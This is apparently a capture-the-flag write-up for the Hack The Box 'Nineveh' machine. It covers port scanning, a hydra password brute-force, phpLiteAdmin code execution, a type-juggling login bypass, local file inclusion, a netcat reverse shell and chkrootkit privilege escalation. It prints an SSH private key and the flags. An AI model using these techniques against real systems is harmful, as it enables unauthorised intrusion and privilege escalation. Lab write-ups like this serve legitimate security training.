# Nineveh

## Enumeration As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports. The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file: > nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.43 -oN allPorts * `-sS` use the **TCP SYN** scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections. * `--min-rate 5000` nmap will try to keep the sending rate **at or above** 5000 packets per second. * `-p-` scanning the entire port range, **from 1 to 65535**. * `-T5` **insane** mode, it is the fastest mode of the nmap time template. * `-Pn` assume the host is **online**. * `-n` scan without reverse **DNS** resolution. * `-oN` **save** the scan result into a file, in this case the *allports* file. {% code overflow="wrap" %} ```bash # Nmap 7.92 scan initiated Sun Sep 4 12:51:17 2022 as: nmap -sS -p- --min-rate 5000 -Pn -n -oN allPorts 10.10.10.43 Nmap scan report for 10.10.10.43 Host is up (0.053s latency). Not shown: 65533 filtered tcp ports (no-response) PORT STATE SERVICE 80/tcp open http 443/tcp open https # Nmap done at Sun Sep 4 12:51:43 2022 -- 1 IP address (1 host up) scanned in 26.70 seconds ``` {% endcode %} Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file: > nmap -sC -sV -p80,443 10.10.10.43 -oN targeted * `-sC` performs the scan using the default set of **scripts**. * `-sV` enables **version** detection. * `-oN` **save** the scan result into file, in this case the *targeted* file. {% code overflow="wrap" %} ```bash # Nmap 7.92 scan initiated Sun Sep 4 12:51:59 2022 as: nmap -sCV -p80,443 -oN targeted 10.10.10.43 Nmap scan report for 10.10.10.43 Host is up (0.059s latency). PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-title: Site doesn`t have a title (text/html). |_http-server-header: Apache/2.4.18 (Ubuntu) 443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu)) | ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR | Not valid before: 2017-07-01T15:03:30 |_Not valid after: 2018-07-01T15:03:30 |_http-title: Site doesn't have a title (text/html). |_ssl-date: TLS randomness does not represent time | tls-alpn: |_ http/1.1 |_http-server-header: Apache/2.4.18 (Ubuntu) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sun Sep 4 12:52:19 2022 -- 1 IP address (1 host up) scanned in 19.62 seconds ``` {% endcode %} As we can see in the nmap report, there is a domain name. Let's add it to the `/etc/hosts` file. > nano /etc/hosts ```nginx # Host addresses 127.0.0.1 localhost 127.0.1.1 alfa8sa ::1 localhost ip6-localhost ip6-loopback ff02::1 ip6-allnodes f02::2 ip6-allrouters 10.10.10.43 nineveh.htb ``` If we check the website on port 80, we won't see much going on.

On the other hand, the website on port 443 only has one image.

If we enumerate subdirectories on the HTTP website, we'll find the `/info.php` and `department` entries. > gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200 -x txt,php * `dir` enumerates **directories or files**. * `-u` the **target** URL. * `-w` path to the **wordlist**. * `-t` number of current **threads**, in this case 200 threads. * `-x` file **extensions** to search for. ``` =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.10.43 [+] Method: GET [+] Threads: 200 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Extensions: txt,php [+] Timeout: 10s =============================================================== 2022/09/04 17:04:21 Starting gobuster in directory enumeration mode =============================================================== /info.php (Status: 200) [Size: 83689] /department (Status: 301) [Size: 315] [--> http://10.10.10.43/department/] =============================================================== 2022/09/04 17:12:34 Finished =============================================================== ``` And if we do the same in the HTTPS website, we'll find the /db directory. > gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200 -x txt,php -k * `dir` enumerates **directories or files**. * `-u` the **target** URL. * `-w` path to the **wordlist**. * `-t` number of current **threads**, in this case 200 threads. * `-x` file **extensions** to search for. * `-k` skip **TLS certificate** verification. ``` =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: https://10.10.10.43 [+] Method: GET [+] Threads: 200 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Extensions: txt,php [+] Timeout: 10s =============================================================== 2022/09/04 17:15:14 Starting gobuster in directory enumeration mode =============================================================== /db (Status: 301) [Size: 309] [--> https://10.10.10.43/db/] =============================================================== 2022/09/04 17:15:33 Finished =============================================================== ``` The `/department` directory is just a login page which asks for a username and a password.

And the `/db` directory of the *HTTPS* website is a *phpLiteAdmin v1.9* login panel which asks for a password.

## Exploitation As the login page in the /db directory only asks for a password, we could try to brute-force it with hydra. > hydra -l admin -P /usr/share/SecLists/Passwords/twitter-banned.txt 10.10.10.43 https-post-form "/db/index.php:password=^PASS^\&remember=yes\&login=Log+In\&proc\_login=true:Incorrect password." * `-l` **username**. * `-P` password wordlist. * `https-post-form` make an HTTPS POST request. * `-t` number of current **threads**, in this case 200 threads. * `-x` file **extensions** to search for. * `-k` skip **TLS certificate** verification. ``` Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-09-04 17:22:40 [DATA] max 16 tasks per 1 server, overall 16 tasks, 399 login tries (l:1/p:399), ~25 tries per task [DATA] attacking http-post-forms://10.10.10.43:443/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password. [443][http-post-form] host: 10.10.10.43 login: admin password: password123 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-09-04 17:23:01 ``` Now we know the password is `password123`, let's log in.

At this point, I look for ways of getting a *Remote Code Execution* on the machine, and I found this GitHub [repository](https://github.com/F-Masood/PHPLiteAdmin-1.9.3---Exploit-PoC) which explains how to do it. First, let's create a new database with the `.php` extension.

Then, select the new database. As we can see, the file is located in `/var/tmp/rce.php`.

And create a new table with one field.

The type of the column should set to `TEXT`, and the default value should be set to ``.

Now the table is created, but we have to find a way of accessing it, so we can execute commands.

If we try to log in as the test user in the `/department` page, we'll get an error saying `invalid username`.

As we saw in the *SSL* certificate, it is signed as the `admin@nineveh.htb` user. We could try to log in as the `admin` user in the `/department` login page.

We get the message `Invalid Password!` which means that `admin` is a valid user. At this point, I intercepted the login request with BurpSuite, and tried to do a *Type Juggling* attack. {% hint style="info" %} **Type Juggling** vulnerabilities are a class of vulnerability wherein an object is initialized or accessed as the incorrect type, allowing an attacker to potentially bypass authentication or undermine the type safety of an application, possibly leading to arbitrary code execution. {% endhint %} If we modify the login request and change the current payload. > username=admin\&password=test To the following one. > username=admin\&password\[]= We should bypass the login panel.

If we go to the `Notes` section, we'll see a note from the `amrois` user. Note the URL. >

I tried to do a *Local File Inclusion* attack in the `notes` GET parameter, trying to import the `/etc/passwd` file. And the following parameter seems to work. >

Now, we can access the database PHP file we created earlier, which is located in `/var/tmp/rce.php`. And we can execute commands with the `cmd` parameter as the `www-data` user. >

Time to get a shell. First, let's set a *netcat* listener on port *4444*. > nc -lvnp 4444 * `-l` **listen** mode. * `-v` **verbose** mode. * `-n` **numeric-only** IP, no DNS resolution. * `-p` specify the **port** to listen on. Now, execute access the following URL, which will send us a reverse shell. > ``` listening on [any] 4444 ... connect to [10.10.14.9] from (UNKNOWN) [10.10.10.43] 50608 /bin/sh: 0: can't access tty; job control turned off $ whoami www-data ``` ## Privilege Escalation First, let's set an interactive *TTY* shell. > script /dev/null -c /bin/bash Then I press `Ctrl+Z` and execute the following command on my local machine: > stty raw -echo; fg > > reset > > Terminal type? xterm Next, I export a few variables: > export TERM=xterm > > export SHELL=bash Finally, I run the following command in our local machine: > stty size ``` 51 236 ``` And set the proper dimensions in the victim machine: > stty rows 51 columns 236 If check in the `/var/www/ssl/secure_notes/` directory, we'll see an image which weights a lot. > ls -l /var/www/ssl/secure\_notes/ ```bash total 2832 -rw-r--r-- 1 root root 71 Jul 2 2017 index.html -rw-r--r-- 1 root root 2891984 Jul 2 2017 nineveh.png ``` If we list the strings of the file, we'll see an *SSH* private key of the `amrois` user. > strings /var/www/ssl/secure\_notes/nineveh.png {% code overflow="wrap" %} ``` ... -----BEGIN RSA PRIVATE KEY----- MIIEowIBAAKCAQEAri9EUD7bwqbmEsEpIeTr2KGP/wk8YAR0Z4mmvHNJ3UfsAhpI H9/Bz1abFbrt16vH6/jd8m0urg/Em7d/FJncpPiIH81JbJ0pyTBvIAGNK7PhaQXU PdT9y0xEEH0apbJkuknP4FH5Zrq0nhoDTa2WxXDcSS1ndt/M8r+eTHx1bVznlBG5 FQq1/wmB65c8bds5tETlacr/15Ofv1A2j+vIdggxNgm8A34xZiP/WV7+7mhgvcnI 3oqwvxCI+VGhQZhoV9Pdj4+D4l023Ub9KyGm40tinCXePsMdY4KOLTR/z+oj4sQT X+/1/xcl61LADcYk0Sw42bOb+yBEyc1TTq1NEQIDAQABAoIBAFvDbvvPgbr0bjTn KiI/FbjUtKWpWfNDpYd+TybsnbdD0qPw8JpKKTJv79fs2KxMRVCdlV/IAVWV3QAk FYDm5gTLIfuPDOV5jq/9Ii38Y0DozRGlDoFcmi/mB92f6s/sQYCarjcBOKDUL58z GRZtIwb1RDgRAXbwxGoGZQDqeHqaHciGFOugKQJmupo5hXOkfMg/G+Ic0Ij45uoR JZecF3lx0kx0Ay85DcBkoYRiyn+nNgr/APJBXe9Ibkq4j0lj29V5dT/HSoF17VWo 9odiTBWwwzPVv0i/JEGc6sXUD0mXevoQIA9SkZ2OJXO8JoaQcRz628dOdukG6Utu Bato3bkCgYEA5w2Hfp2Ayol24bDejSDj1Rjk6REn5D8TuELQ0cffPujZ4szXW5Kb ujOUscFgZf2P+70UnaceCCAPNYmsaSVSCM0KCJQt5klY2DLWNUaCU3OEpREIWkyl 1tXMOZ/T5fV8RQAZrj1BMxl+/UiV0IIbgF07sPqSA/uNXwx2cLCkhucCgYEAwP3b vCMuW7qAc9K1Amz3+6dfa9bngtMjpr+wb+IP5UKMuh1mwcHWKjFIF8zI8CY0Iakx DdhOa4x+0MQEtKXtgaADuHh+NGCltTLLckfEAMNGQHfBgWgBRS8EjXJ4e55hFV89 P+6+1FXXA1r/Dt/zIYN3Vtgo28mNNyK7rCr/pUcCgYEAgHMDCp7hRLfbQWkksGzC fGuUhwWkmb1/ZwauNJHbSIwG5ZFfgGcm8ANQ/Ok2gDzQ2PCrD2Iizf2UtvzMvr+i tYXXuCE4yzenjrnkYEXMmjw0V9f6PskxwRemq7pxAPzSk0GVBUrEfnYEJSc/MmXC iEBMuPz0RAaK93ZkOg3Zya0CgYBYbPhdP5FiHhX0+7pMHjmRaKLj+lehLbTMFlB1 MxMtbEymigonBPVn56Ssovv+bMK+GZOMUGu+A2WnqeiuDMjB99s8jpjkztOeLmPh PNilsNNjfnt/G3RZiq1/Uc+6dFrvO/AIdw+goqQduXfcDOiNlnr7o5c0/Shi9tse i6UOyQKBgCgvck5Z1iLrY1qO5iZ3uVr4pqXHyG8ThrsTffkSVrBKHTmsXgtRhHoc il6RYzQV/2ULgUBfAwdZDNtGxbu5oIUB938TCaLsHFDK6mSTbvB/DywYYScAWwF7 fw4LVXdQMjNJC3sn3JaqY1zJkE4jXlZeNQvCx4ZadtdJD9iO+EUG -----END RSA PRIVATE KEY----- ... ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCuL0RQPtvCpuYSwSkh5OvYoY//CTxgBHRniaa8c0ndR+wCGkgf38HPVpsVuu3Xq8fr+N3ybS6uD8Sbt38Umdyk+IgfzUlsnSnJMG8gAY0rs+FpBdQ91P3LTEQQfRqlsmS6Sc/gUflmurSeGgNNrZbFcNxJLWd238zyv55MfHVtXOeUEbkVCrX/CYHrlzxt2zm0ROVpyv/Xk5+/UDaP68h2CDE2CbwDfjFmI/9ZXv7uaGC9ycjeirC/EIj5UaFBmGhX092Pj4PiXTbdRv0rIabjS2KcJd4+wx1jgo4tNH/P6iPixBNf7/X/FyXrUsANxiTRLDjZs5v7IETJzVNOrU0R amrois@nineveh.htb ... ``` {% endcode %} And as we can see, port 22 is open. > netstat -tulpn * `-t` **TCP** connections. * `-u` **UDP** connections. * `-l` **listening**. * `-p` show the **PID/Program name**. * `-n` don't resolve **names**. ``` (Not all processes could be identified, non-owned process info will not be shown, you would have to be root to see it all.) Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN - tcp6 0 0 :::22 :::* LISTEN - ``` Let's copy the key into the `/tmp/id_rsa` file, and give it the right permissions. > nano /tmp/id\_rsa > > chmod 600 /tmp/id\_rsa Now we can log in as the `amrois` user via SSH, and we'll be able to grab the user flag. > ssh -i /tmp/id\_rsa amrois\@127.0.0.1 ``` Could not create directory '/var/www/.ssh'. The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established. ECDSA key fingerprint is SHA256:aWXPsULnr55BcRUl/zX0n4gfJy5fg29KkuvnADFyMvk. Are you sure you want to continue connecting (yes/no)? yes Failed to add the host to the list of known hosts (/var/www/.ssh/known_hosts). Ubuntu 16.04.2 LTS Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 288 packages can be updated. 207 updates are security updates. You have mail. Last login: Mon Jul 3 00:19:59 2017 from 192.168.0.14 amrois@nineveh:~$ whoami amrois amrois@nineveh:~$ cat user.txt 5816329477ff124a3935faa4563d2035 ``` At this point, I tried to look for scheduled tasks on the system with the *pspy* tool. Let's transfer [pspy](https://github.com/DominicBreuker/pspy) to the `nineveh` machine. {% hint style="info" %} **pspy** is a command line tool designed to snoop on processes without need for root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute. {% endhint %} > python -m http.server ``` Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... ``` On the `time` machine, go to the `/tmp` directory, download the binary, and give it execution permissions. > cd /tmp > > wget > > chmod +x pspy64 If we execute the tool, we'll see at some point that the `root` user, with the *UID* set to 0, is executing the `/usr/bin/chkrootkit` binary. > ./pspy64 ``` pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855 ██▓███ ██████ ██▓███ ▓██ ██▓ ▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒ ▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░ ▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░ ▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░ ▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒ ░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░ ░░ ░ ░ ░ ░░ ▒ ▒ ░░ ░ ░ ░ ░ ░ Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive) Draining file system events due to startup... done 2022/09/04 11:35:01 CMD: UID=0 PID=21345 | /bin/sh /usr/bin/chkrootkit ``` We can see in [exploit-db](https://www.exploit-db.com/) that there is a [way of escalating privileges](https://www.exploit-db.com/exploits/33899) abusing this binary. First, let's create a file in the `/tmp` directory called `update`, which will give the `/bin/bash` binary the *SUID* permission. > nano /tmp/update > > chmod +x /tmp/update ```bash #!/bin/bash chmod u+s /bin/bash ``` Now, let's wait until the `/bin/bash` binary has the *SUID* permission set, and then all we have to do is execute bash with root permissions, and reap the harvest and take the root flag. > bash -p ``` bash-4.3# whoami root bash-4.3# cat /root/root.txt 7dacd633821519ab7fcdd7d2fe2120df ```